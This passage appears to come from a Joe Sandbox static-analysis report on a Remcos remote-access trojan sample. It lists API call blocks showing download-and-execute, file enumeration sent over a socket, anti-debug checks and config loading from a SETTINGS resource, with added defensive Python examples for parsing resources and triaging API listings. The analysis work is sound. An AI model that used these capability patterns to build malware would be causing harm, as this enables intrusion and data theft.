                                                          • SizeofResource.KERNEL32(00000000,?,?,0040E183,00000000), ref: 0041A67A
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Resource$FindLoadLockSizeof
                                                          • String ID: SETTINGS
                                                          • API String ID: 3473537107-594951305
                                                          • Opcode ID: e32b0715ad7aadeb38a8c4a618404dc1e86643bbbf9351d1ef3d996740a46f90
                                                          • Instruction ID: 83a829ee02157d331b98a48cb758db5ec39b6d120b3a3db205f860a33549a403
                                                          • Opcode Fuzzy Hash: e32b0715ad7aadeb38a8c4a618404dc1e86643bbbf9351d1ef3d996740a46f90
                                                          • Instruction Fuzzy Hash: 3EE01A3A200710ABCB211BA5BC8CD477E39E7867633140036F90582331DA358850CA59
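The four calls above (FindResourceA with type 0000000A, which is RT_RCDATA, followed by LoadResource, LockResource and SizeofResource) are the loader locating a raw-data resource named SETTINGS and obtaining a pointer to it and its size; Remcos keeps its encrypted configuration in such a resource, which is what the report's "Found malware configuration" refers to. The following is an added example, not code from the report or from the sample, of how an offline tool finds that leaf without running the binary: it walks the three-level resource directory (type, name, language) of a .rsrc section. It assumes the caller has already read the raw .rsrc bytes and the section's virtual address from the PE section table (that step is omitted); the build_rsrc helper only constructs a minimal .rsrc blob so the example runs stand-alone, and the payload it embeds is constructed test data, not the real SETTINGS contents.

```python
import struct

RT_RCDATA = 10  # the 0000000A type argument passed to FindResourceA in the listing


def _read_dir(rsrc, off):
    """Return the (name_field, data_field) entries of an IMAGE_RESOURCE_DIRECTORY at off."""
    # Header: Characteristics, TimeDateStamp, Major, Minor, NumberOfNamedEntries, NumberOfIdEntries
    n_named, n_id = struct.unpack_from("<HH", rsrc, off + 12)
    return [struct.unpack_from("<II", rsrc, off + 16 + 8 * i) for i in range(n_named + n_id)]


def _entry_name(rsrc, name_field):
    """Named entries (high bit set) point at a length-prefixed UTF-16 string; otherwise an integer ID."""
    if name_field & 0x80000000:
        soff = name_field & 0x7FFFFFFF
        (length,) = struct.unpack_from("<H", rsrc, soff)
        return rsrc[soff + 2: soff + 2 + 2 * length].decode("utf-16-le")
    return name_field


def _matches(got, want):
    # FindResourceA compares names case-insensitively; IDs compare as integers.
    if isinstance(got, str) and isinstance(want, str):
        return got.upper() == want.upper()
    return got == want


def find_resource(rsrc, rsrc_rva, res_type, res_name):
    """Walk type -> name -> language and return the bytes of the first matching leaf, or None."""
    for t_name, t_data in _read_dir(rsrc, 0):
        if not _matches(_entry_name(rsrc, t_name), res_type) or not t_data & 0x80000000:
            continue
        for n_name, n_data in _read_dir(rsrc, t_data & 0x7FFFFFFF):
            if not _matches(_entry_name(rsrc, n_name), res_name) or not n_data & 0x80000000:
                continue
            for _lang, l_data in _read_dir(rsrc, n_data & 0x7FFFFFFF):
                if l_data & 0x80000000:
                    continue  # a leaf must point at an IMAGE_RESOURCE_DATA_ENTRY, not another dir
                data_rva, size = struct.unpack_from("<II", rsrc, l_data)
                start = data_rva - rsrc_rva  # OffsetToData is an RVA, not a section offset
                return rsrc[start:start + size]
    return None


def build_rsrc(rsrc_rva, name, payload):
    """Construct a minimal .rsrc section (test fixture): one RCDATA type, one named entry, one language leaf."""
    # Layout: 0x00 type dir, 0x18 name dir, 0x30 lang dir, 0x48 data entry, 0x58 name string, then payload
    name_utf16 = name.encode("utf-16-le")
    str_off = 0x58
    data_off = (str_off + 2 + len(name_utf16) + 3) & ~3

    def directory(entry_name, entry_data):
        named = 1 if entry_name & 0x80000000 else 0
        return struct.pack("<IIHHHH", 0, 0, 0, 0, named, 1 - named) + struct.pack("<II", entry_name, entry_data)

    blob = bytearray()
    blob += directory(RT_RCDATA, 0x80000000 | 0x18)            # type RT_RCDATA -> name dir
    blob += directory(0x80000000 | str_off, 0x80000000 | 0x30)  # name "SETTINGS" -> lang dir
    blob += directory(0x0409, 0x48)                             # lang 0x409 -> data entry (leaf)
    blob += struct.pack("<IIII", rsrc_rva + data_off, len(payload), 0, 0)
    blob += struct.pack("<H", len(name)) + name_utf16
    blob += b"\0" * (data_off - len(blob))
    blob += payload
    return bytes(blob)


if __name__ == "__main__":
    section = build_rsrc(0x12000, "SETTINGS", b"constructed-config-bytes")
    print(find_resource(section, 0x12000, RT_RCDATA, "SETTINGS"))
```

On a real sample the same walk starts from the resource data directory of the optional header; the only extra work is mapping that RVA to the .rsrc section's raw offset, which is why find_resource takes the section's RVA as a parameter.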
                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 00407A91
                                                          • FindFirstFileW.KERNEL32(00000000,?,00465AA0,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B4A
                                                          • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B6E
                                                          • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407C76
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Find$File$CloseFirstH_prologNext
                                                          • String ID:
                                                          • API String ID: 1157919129-0
                                                          • Opcode ID: be329e02f9a977489ec03ab4a587285a9e8b683dbacd723bef2334c22b0cd63e
                                                          • Instruction ID: c296e4c637b16ec180f1d25cf2666c4e6f2336455dd814d501b84ef2841b6e91
                                                          • Opcode Fuzzy Hash: be329e02f9a977489ec03ab4a587285a9e8b683dbacd723bef2334c22b0cd63e
                                                          • Instruction Fuzzy Hash: 485173329041085ACB14FB65DD969DD7778AF50318F50417EB806B31E2EF38AB498B99
                                                          APIs
                                                          • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045D478), ref: 00448079
                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,0047179C,000000FF,00000000,0000003F,00000000,?,?), ref: 004480F1
                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,004717F0,000000FF,?,0000003F,00000000,?), ref: 0044811E
                                                          • _free.LIBCMT ref: 00448067
                                                            • Part of subcall function 00446AC5: HeapFree.KERNEL32(00000000,00000000,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?), ref: 00446ADB
                                                            • Part of subcall function 00446AC5: GetLastError.KERNEL32(?,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?,?), ref: 00446AED
                                                          • _free.LIBCMT ref: 00448233
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
                                                          • String ID:
                                                          • API String ID: 1286116820-0
                                                          • Opcode ID: c081d488f34b9915cd9b048b6b498da186ffe618eda021c7ed3f66206b9427ec
                                                          • Instruction ID: adcac59616ce0bf4d9b6f5e4feac4fc1c4b096f081e8a0f87c9a15d47e4c4f65
                                                          • Opcode Fuzzy Hash: c081d488f34b9915cd9b048b6b498da186ffe618eda021c7ed3f66206b9427ec
                                                          • Instruction Fuzzy Hash: 13510B719002099BE714DF69DC819AFB7BCEF41354F10456FE454A32A1EF389E46CB58
                                                          APIs
                                                          • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00406234
                                                          • URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 00406318
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: DownloadExecuteFileShell
                                                          • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe$open
                                                          • API String ID: 2825088817-4294605632
                                                          • Opcode ID: 994fa26aecbf6e7c3222de66d1bae1110effc07295645d0cc09e5d0c67af1d4a
                                                          • Instruction ID: f68f5450864a8ef507c8d3860f756bd811b48be2db930e76b40a644c5c1bb7bc
                                                          • Opcode Fuzzy Hash: 994fa26aecbf6e7c3222de66d1bae1110effc07295645d0cc09e5d0c67af1d4a
                                                          • Instruction Fuzzy Hash: 0761A33160434067CA14FA76C8569BE77A69F81718F00493FBC46772D6EF3C9A05C69B
                                                          APIs
                                                          • FindFirstFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00406ADD
                                                          • FindNextFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00406BA5
                                                            • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: FileFind$FirstNextsend
                                                          • String ID: x@G$x@G
                                                          • API String ID: 4113138495-3390264752
                                                          • Opcode ID: be8fdfc8a6072efbca1459ab7643d284853c2ddcf9d8b62b0637e10f69e8db4b
                                                          • Instruction ID: 9df0c8526107c53e8273efc1e688d8f669138e67c86485f4ac558c26d22f9560
                                                          • Opcode Fuzzy Hash: be8fdfc8a6072efbca1459ab7643d284853c2ddcf9d8b62b0637e10f69e8db4b
                                                          • Instruction Fuzzy Hash: B42147725043015BC714FB61D8959AF77A8AFD1358F40093EF996A31D1EF38AA088A9B
                                                          APIs
                                                          • SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041BC6C
                                                            • Part of subcall function 004126D2: RegCreateKeyA.ADVAPI32(80000001,Control Panel\Desktop,004655B0), ref: 004126E1
                                                            • Part of subcall function 004126D2: RegSetValueExA.ADVAPI32(004655B0,?,00000000,?,00000000,00000000,Control Panel\Desktop,?,?,0041BC46,WallpaperStyle,004655B0,00000001,00473EE8,00000000), ref: 00412709
                                                            • Part of subcall function 004126D2: RegCloseKey.ADVAPI32(004655B0,?,?,0041BC46,WallpaperStyle,004655B0,00000001,00473EE8,00000000,?,004079DD,00000001), ref: 00412714
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CloseCreateInfoParametersSystemValue
                                                          • String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
                                                          • API String ID: 4127273184-3576401099
                                                          • Opcode ID: b2749757bbb715b84591827a24ab2664cb1dcc6a43466099e0f50718dd789739
                                                          • Instruction ID: a6c166168c7895b99543370299e99232025f4d6daba66cbb636fef562e17b9dc
                                                          • Opcode Fuzzy Hash: b2749757bbb715b84591827a24ab2664cb1dcc6a43466099e0f50718dd789739
                                                          • Instruction Fuzzy Hash: 06112432B8060433D514303A4E6FBAE1806D356B60FA4415FF6026A6DAFA9E5AE103DF
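The API lines in these function blocks are the most useful part of the listing for triage: read together, a block's calls (including the indented "Part of subcall function" lines) describe one capability, such as URLDownloadToFileW followed by ShellExecuteW (download and execute), FindFirstFileW/FindNextFileW with a send subcall (file enumeration feeding a socket), or SystemParametersInfoW with uiAction 00000014 (SPI_SETDESKWALLPAPER) next to writes under Control Panel\Desktop. The following is an added example, not code from Joe Sandbox or the report, that parses these lines into structured records and tags each block with the capability its API combination implies. The SAMPLE text is a constructed excerpt copied from the listings above; the capability names and rules are this example's own and not Joe Sandbox signature names.

```python
import re

# Constructed sample: API lines copied from four of the function blocks in the listing.
SAMPLE = r"""
APIs
• FindResourceA.KERNEL32(SETTINGS,0000000A,00000000), ref: 0041A650
• LoadResource.KERNEL32(00000000,?,?,0040E183,00000000), ref: 0041A664
• LockResource.KERNEL32(00000000,?,?,0040E183,00000000), ref: 0041A66B
• SizeofResource.KERNEL32(00000000,?,?,0040E183,00000000), ref: 0041A67A
APIs
• ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00406234
• URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 00406318
APIs
• FindFirstFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00406ADD
• FindNextFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00406BA5
  • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
APIs
• SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041BC6C
  • Part of subcall function 004126D2: RegCreateKeyA.ADVAPI32(80000001,Control Panel\Desktop,004655B0), ref: 004126E1
"""

LINE_RE = re.compile(
    r"(?:Part of subcall function (?P<caller>[0-9A-F]{8}): )?"
    r"(?P<api>\w+)\.(?P<module>\w+)\((?P<args>.*)\), ref: (?P<ref>[0-9A-F]{8})"
)

SPI_SETDESKWALLPAPER = 0x14
RT_RCDATA = 0x0A


def parse_listing(text):
    """Split the listing into one list of call records per 'APIs' block."""
    functions, current = [], None
    for raw in text.splitlines():
        line = raw.strip().lstrip("• ").strip()
        if line == "APIs":
            current = []
            functions.append(current)
            continue
        m = LINE_RE.search(line)
        if m and current is not None:
            current.append({
                "api": m["api"],
                "module": m["module"],
                "args": [a.strip() for a in m["args"].split(",")] if m["args"] else [],
                "ref": int(m["ref"], 16),
                "subcall": m["caller"] is not None,  # reached through a callee, still part of the behaviour
            })
    return functions


def _hex(arg):
    """Decode an 8-digit hex argument; '?' and string arguments return None."""
    return int(arg, 16) if re.fullmatch(r"[0-9A-F]{8}", arg) else None


def _arg_is(calls, api, index, value):
    return any(c["api"] == api and len(c["args"]) > index and _hex(c["args"][index]) == value for c in calls)


# (capability, APIs that must all appear in the block, extra predicate on the call records)
RULES = [
    ("load-rcdata-resource", {"FindResourceA", "LoadResource", "LockResource"},
     lambda calls: _arg_is(calls, "FindResourceA", 1, RT_RCDATA)),
    ("download-and-execute", {"URLDownloadToFileW", "ShellExecuteW"}, lambda calls: True),
    ("enumerate-files-and-send", {"FindFirstFileW", "FindNextFileW", "send"}, lambda calls: True),
    ("set-wallpaper", {"SystemParametersInfoW"},
     lambda calls: _arg_is(calls, "SystemParametersInfoW", 0, SPI_SETDESKWALLPAPER)),
]


def capabilities(calls):
    """Return the capability tags whose required APIs all occur in this block (subcalls included)."""
    apis = {c["api"] for c in calls}
    return [name for name, needed, check in RULES if needed <= apis and check(calls)]


def triage(text):
    return [capabilities(block) for block in parse_listing(text)]


if __name__ == "__main__":
    for block, tags in zip(parse_listing(SAMPLE), triage(SAMPLE)):
        print(f"{block[0]['ref']:08X}", [c["api"] for c in block], tags)
```

Arguments are kept as the report prints them ('?' for values the static pass could not resolve), so rules that depend on a constant, like the SPI_SETDESKWALLPAPER check, only fire when the value was actually recovered; a block whose API set matches but whose arguments are unknown is deliberately left untagged rather than guessed.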
                                                          APIs
                                                            • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,?,?,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B), ref: 00446EC3
                                                            • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                            • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B,?,00000041,00000000,00000000), ref: 00446F37
                                                            • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                          • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00443CF3,?,?,?,?,?,?,00000004), ref: 00450B61
                                                          • _wcschr.LIBVCRUNTIME ref: 00450BF1
                                                          • _wcschr.LIBVCRUNTIME ref: 00450BFF
                                                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,00443CF3,00000000,00443E13), ref: 00450CA2
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
                                                          • String ID:
                                                          • API String ID: 4212172061-0
                                                          • Opcode ID: 11e9d858be2eef57e51fe3ee5abaff11ba74f3cf781d1ad02b19bd3dc5989495
                                                          • Instruction ID: a02e79dc60b90d06ce6287b0e519d5a2a37574338541b46fb9e412c2f7ec0900
                                                          • Opcode Fuzzy Hash: 11e9d858be2eef57e51fe3ee5abaff11ba74f3cf781d1ad02b19bd3dc5989495
                                                          • Instruction Fuzzy Hash: D7613B79600306AAD729AB75CC82AAB73ACEF05316F14052FFD05D7243E778E909C768
                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 00408DAC
                                                          • FindFirstFileW.KERNEL32(00000000,?), ref: 00408E24
                                                          • FindNextFileW.KERNEL32(00000000,?), ref: 00408E4D
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: FileFind$FirstH_prologNext
                                                          • String ID:
                                                          • API String ID: 301083792-0
                                                          • Opcode ID: 0245cb435e7972fa9dc1819fe4f867f76e5734f3076513a46e64ed25397209d2
                                                          • Instruction ID: 60446431aa0b45b5fc099c057f6d50f3e7887136e12703af2d86415be67689ac
                                                          • Opcode Fuzzy Hash: 0245cb435e7972fa9dc1819fe4f867f76e5734f3076513a46e64ed25397209d2
                                                          • Instruction Fuzzy Hash: 357140328001099BCB15EBA1DC919EE7778AF54318F10427FE856B71E2EF386E45CB98
                                                          APIs
                                                            • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,?,?,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B), ref: 00446EC3
                                                            • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                            • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B,?,00000041,00000000,00000000), ref: 00446F37
                                                            • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                            • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446F1E
                                                            • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B,?,00000041,00000000,00000000), ref: 00446F2B
                                                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00450EBE
                                                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00450F0F
                                                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00450FCF
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ErrorInfoLastLocale$_free$_abort
                                                          • String ID:
                                                          • API String ID: 2829624132-0
                                                          • Opcode ID: 022617d048d67c565bd8cd478daba609af81f9e307d0efc84ddd0a3e182c2dec
                                                          • Instruction ID: e92eb603d23812efeda5bde14236c6fbce748c008cf001f3fb8de25b7fcb8669
                                                          • Opcode Fuzzy Hash: 022617d048d67c565bd8cd478daba609af81f9e307d0efc84ddd0a3e182c2dec
                                                          • Instruction Fuzzy Hash: AC61D3365002079FDB289F24CD82BBB77A8EF04706F1041BBED05C6696E778D989DB58
                                                          APIs
                                                          • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 0043A755
                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 0043A75F
                                                          • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 0043A76C
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                          • String ID:
                                                          • API String ID: 3906539128-0
                                                          • Opcode ID: 3fa352bae2dd0906ed67bad857870cf194ce26166e1b5da63b4ea542d53f5057
                                                          • Instruction ID: 15fc2c217458336097e8e19d69e2940e7c5a4b77666d4e23b7e272f62fea865b
                                                          • Opcode Fuzzy Hash: 3fa352bae2dd0906ed67bad857870cf194ce26166e1b5da63b4ea542d53f5057
                                                          • Instruction Fuzzy Hash: 2D31D47490121CABCB21DF64D98979DBBB8BF08310F5052EAE81CA7251E7349F81CF49
                                                          APIs
                                                          • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000,?,00000001,004326C2,00000024,?,?,?), ref: 0043294C
                                                          • CryptGenRandom.ADVAPI32(?,?,?,?,?,?,?,?,?,0042CBBE,?), ref: 00432962
                                                          • CryptReleaseContext.ADVAPI32(?,00000000,?,?,?,?,?,?,0042CBBE,?), ref: 00432974
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Crypt$Context$AcquireRandomRelease
                                                          • String ID:
                                                          • API String ID: 1815803762-0
                                                          • Opcode ID: 04772303a0a25dfd0b8e93efaf4bd4cd6a07a437a7117abaa9b2762516ca9460
                                                          • Instruction ID: 80435fde6f6b62f03973a002229794bf261f16e8857de4c024377aa862d1bdf3
                                                          • Opcode Fuzzy Hash: 04772303a0a25dfd0b8e93efaf4bd4cd6a07a437a7117abaa9b2762516ca9460
                                                          • Instruction Fuzzy Hash: 11E06D31308211BBEB310E25BC08F573F94AF89B71F71053AB211E40E4C2A188419A1C
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: .
                                                          • API String ID: 0-248832578
                                                          • Opcode ID: abd6fd6b538380b102c55790d6b56a2ac58ff5115e1efa51d285ee8eb71cff1a
                                                          • Instruction ID: db76f937e81630575b2700384d205b0ac401e8f874fa32e43cac1aabc581782c
                                                          • Opcode Fuzzy Hash: abd6fd6b538380b102c55790d6b56a2ac58ff5115e1efa51d285ee8eb71cff1a
                                                          • Instruction Fuzzy Hash: CB310471900209AFEB249E79CC84EEB7BBDDB86318F1101AEF91897251E6389D458B64
                                                          APIs
                                                            • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,?,?,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B), ref: 00446EC3
                                                            • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                            • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B,?,00000041,00000000,00000000), ref: 00446F37
                                                            • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                          • EnumSystemLocalesW.KERNEL32(00450E6A,00000001,00000000,?,<D,?,00451497,00000000,?,?,?), ref: 00450DB4
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                          • String ID: <D
                                                          • API String ID: 1084509184-3866323178
                                                          • Opcode ID: 99518e0148a584110f8bf4689e731d5402797eff59b4f7bbd4ab81c0230e503e
                                                          • Instruction ID: b1cdb4a87285138648e71eec5b58018a028c0508cbf90fbfa4a5e64eba390ba2
                                                          • Opcode Fuzzy Hash: 99518e0148a584110f8bf4689e731d5402797eff59b4f7bbd4ab81c0230e503e
                                                          • Instruction Fuzzy Hash: 9C11293B2007055FDB189F79D8916BAB7A1FF8031AB14442DE94647741D375B846C744
                                                          APIs
                                                            • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,?,?,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B), ref: 00446EC3
                                                            • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                            • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B,?,00000041,00000000,00000000), ref: 00446F37
                                                            • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                          • EnumSystemLocalesW.KERNEL32(004510BA,00000001,?,?,<D,?,0045145B,<D,?,?,?,?,?,00443CEC,?,?), ref: 00450E29
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                          • String ID: <D
                                                          • API String ID: 1084509184-3866323178
                                                          • Opcode ID: e0c48b72e2c1269c4cdc51d0e461bd75820cdd7fcb75359b91497d16354a5322
                                                          • Instruction ID: d323619e2976bd52c5edaa4f55efd93dda7e8b303aa23e489220a9c0c916f3e4
                                                          • Opcode Fuzzy Hash: e0c48b72e2c1269c4cdc51d0e461bd75820cdd7fcb75359b91497d16354a5322
                                                          • Instruction Fuzzy Hash: 5BF0223A2003045FDB145F3AD882AAB7B95EF81729B25842EFD058B782D275AC42C644
                                                          APIs
                                                          • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,?,?,00000004), ref: 004475EA
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: InfoLocale
                                                          • String ID: GetLocaleInfoEx
                                                          • API String ID: 2299586839-2904428671
                                                          • Opcode ID: f5e2153e4984e43413bf11c07bd0b6bdf0abc05710bcbde66c151b87e472c2d2
                                                          • Instruction ID: 80a81796b135a3e0eaabc3ca7fb48afb6b687e063e78a0117ef0368584b3b56e
                                                          • Opcode Fuzzy Hash: f5e2153e4984e43413bf11c07bd0b6bdf0abc05710bcbde66c151b87e472c2d2
                                                          • Instruction Fuzzy Hash: 82F0F031A44308BBDB11AF61EC06F6E7B25EF04712F00416AFC046A2A2CB359E11969E
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 5fe4b2cb4502993dbea9aed901accaaf97bf6201a09a40e91719f5fde44f0d4f
                                                          • Instruction ID: cffdc6bb8eb20f5336ace8b102e865ec7dcfb2cf624fb46ac032ba80a60d6a90
                                                          • Opcode Fuzzy Hash: 5fe4b2cb4502993dbea9aed901accaaf97bf6201a09a40e91719f5fde44f0d4f
                                                          • Instruction Fuzzy Hash: 8A024C71E002199BEF14CFA9C9806AEBBF1FF88314F25826AD919E7350D735AD45CB84
                                                          APIs
                                                          • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,004520CD,?,?,00000008,?,?,00455412,00000000), ref: 004522FF
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ExceptionRaise
                                                          • String ID:
                                                          • API String ID: 3997070919-0
                                                          • Opcode ID: 10c23660bdf4a559c67b3dd21211c83afc8534fe451efaff8b0d30b37073b707
